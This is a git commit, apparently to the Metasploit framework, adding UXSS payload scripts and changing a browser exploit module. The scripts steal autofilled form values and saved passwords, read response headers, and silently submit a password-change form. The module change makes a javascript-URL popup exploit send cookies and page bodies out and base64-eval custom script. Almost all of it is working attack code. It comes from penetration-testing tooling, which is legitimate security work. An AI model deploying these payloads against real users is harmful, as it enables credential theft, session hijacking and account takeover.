Add some common UXSS scripts.

bug/bundler_fix
Joe Vennix 2014-09-09 02:31:27 -05:00
parent 27889ea411
commit 7793ed4fea
No known key found for this signature in database
GPG Key ID: 127B05FB3E85A2B0
4 changed files with 108 additions and 8 deletions

View File

@ -0,0 +1,33 @@
/* steal_form.js: can be injected into a frame/window after a UXSS */
/* exploit to steal any autofilled inputs, saved passwords, or any */
/* data entered into a form. */
/* keep track of what input fields we have discovered */
var found = {};
setInterval(function(){
/* poll the DOM to check for any new input fields */
var inputs = document.querySelectorAll('input,textarea,select');
Array.prototype.forEach.call(inputs, function(input) {
var val = input.value||'';
var name = input.getAttribute('name')||'';
var t = input.getAttribute('type')||'';
if (input.tagName == 'SELECT') {
try { val = input.querySelector('option:checked').value }
catch (e) {}
}
if (input.tagName == 'INPUT' && t.toLowerCase()=='hidden') return;
/* check if this is a valid input/value pair */
try {
if (val.length && name.length) {
if (found[name] != val) {
/* new input/value discovered, remember it and send it up */
found[name] = val;
var result = { name: name, value: val, url: window.location.href, send: true };
(opener||top).postMessage(JSON.stringify(result), '*');
}
}
} catch (e) {}
});
}, 200);

View File

@ -0,0 +1,17 @@
/* steal_headers.js: can be injected into a frame/window after a UXSS */
/* exploit to steal the response headers of the loaded URL. */
/* send an XHR request to our current page */
var x = new XMLHttpRequest;
x.open('GET', window.location.href, true);
x.onreadystatechange = function() {
/* when the XHR request is complete, grab the headers and send them back */
if (x.readyState == 2) {
(opener||top).postMessage(JSON.stringify({
headers: x.getAllResponseHeaders(),
url: window.location.href,
send: true
}), '*');
}
};
x.send();

View File

@ -0,0 +1,36 @@
/* submit_form.js: can be injected into a frame/window after a UXSS */
/* exploit to modify and submit a form in the target page. */
/* modify this hash to your liking */
var formInfo = {
/* CSS selector for the form you want to submit */
selector: 'form[action="/update_password"]',
/* inject values into some input fields */
inputs: {
'user[new_password]': 'pass1234',
'user[new_password_confirm]': 'pass1234'
}
}
var c = setInterval(function(){
/* find the form... */
var form = document.querySelector(formInfo.selector);
if (!form) return;
/* loop over every input field, set the value as specified. */
Array.prototype.forEach.call(form.elements, function(input) {
var inject = formInfo.inputs[input.name];
if (inject) input.setAttribute('value', inject);
});
/* submit the form and clean up */
form.submit();
clearInterval(c);
/* report back */
var message = "Form submitted to "+form.getAttribute('action');
var url = window.location.href;
(opener||top).postMessage(JSON.stringify({message: message, url: url}), '*');
}, 100);

View File

@ -53,6 +53,11 @@ class Metasploit3 < Msf::Auxiliary
false, false,
"Bypass URLs that have X-Frame-Options by using a one-click popup exploit.", "Bypass URLs that have X-Frame-Options by using a one-click popup exploit.",
false false
]),
OptBool.new('CLOSE_POPUP', [
false,
"When BYPASS_XFO is enabled, this closes the popup window after exfiltration.",
true
]) ])
], self.class) ], self.class)
end end
@ -76,8 +81,11 @@ class Metasploit3 < Msf::Auxiliary
var received = []; var received = [];
window.addEventListener('message', function(e) { window.addEventListener('message', function(e) {
if (bypassXFO && received[JSON.parse(e.data).i]) return; var data = JSON.parse(e.data);
if (!data.send) {
if (bypassXFO && data.i && received[data.i]) return;
if (bypassXFO && e.data) received.push(true); if (bypassXFO && e.data) received.push(true);
}
var x = new XMLHttpRequest; var x = new XMLHttpRequest;
x.open('POST', window.location, true); x.open('POST', window.location, true);
x.send(e.data); x.send(e.data);
@ -105,12 +113,14 @@ class Metasploit3 < Msf::Auxiliary
function attack(target, n, i, cachedN) { function attack(target, n, i, cachedN) {
var exploit = function(){ var exploit = function(){
window.open('\\u0000javascript:if(document&&document.body){(opener||top).postMessage(JSON.stringify({cookie:document'+ window.open('\\u0000javascript:if(document&&document.body){(opener||top).postMessage('+
'.cookie,url:location.href,body:document.body.innerHTML,i:'+(i||0)+'}),"*");'+ 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+
'#{datastore['CUSTOM_JS']||''};}void(0);', n); 'TML,i:'+(i||0)+'}),"*");eval(atob("#{Rex::Text.encode_base64(datastore['CUSTOM_JS'])}"'+
'));}void(0);', n);
} }
if (!n) { if (!n) {
n = cachedN || randomString(); n = cachedN || randomString();
var closePopup = #{datastore['CLOSE_POPUP']};
var w = window.open(target, n); var w = window.open(target, n);
var deadman = setTimeout(function(){ var deadman = setTimeout(function(){
clearInterval(clear); clearInterval(clear);
@ -119,15 +129,19 @@ class Metasploit3 < Msf::Auxiliary
}, 10000); }, 10000);
var clear = setInterval(function(){ var clear = setInterval(function(){
if (received[i]) { if (received[i]) {
if (i < targets.length-1) {
try{ w.stop(); }catch(e){} try{ w.stop(); }catch(e){}
try{ w.location='data:text/html,<p>Loading...</p>'; }catch(e){} try{ w.location='data:text/html,<p>Loading...</p>'; }catch(e){}
}
clearInterval(clear); clearInterval(clear);
clearInterval(clear2); clearInterval(clear2);
clearTimeout(deadman); clearTimeout(deadman);
if (i < targets.length-1) { if (i < targets.length-1) {
setTimeout(function(){ attack(targets[i+1], null, i+1, n); },100); setTimeout(function(){ attack(targets[i+1], null, i+1, n); },100);
} else { } else {
w.close(); if (closePopup) w.close();
} }
} }
}, 50); }, 50);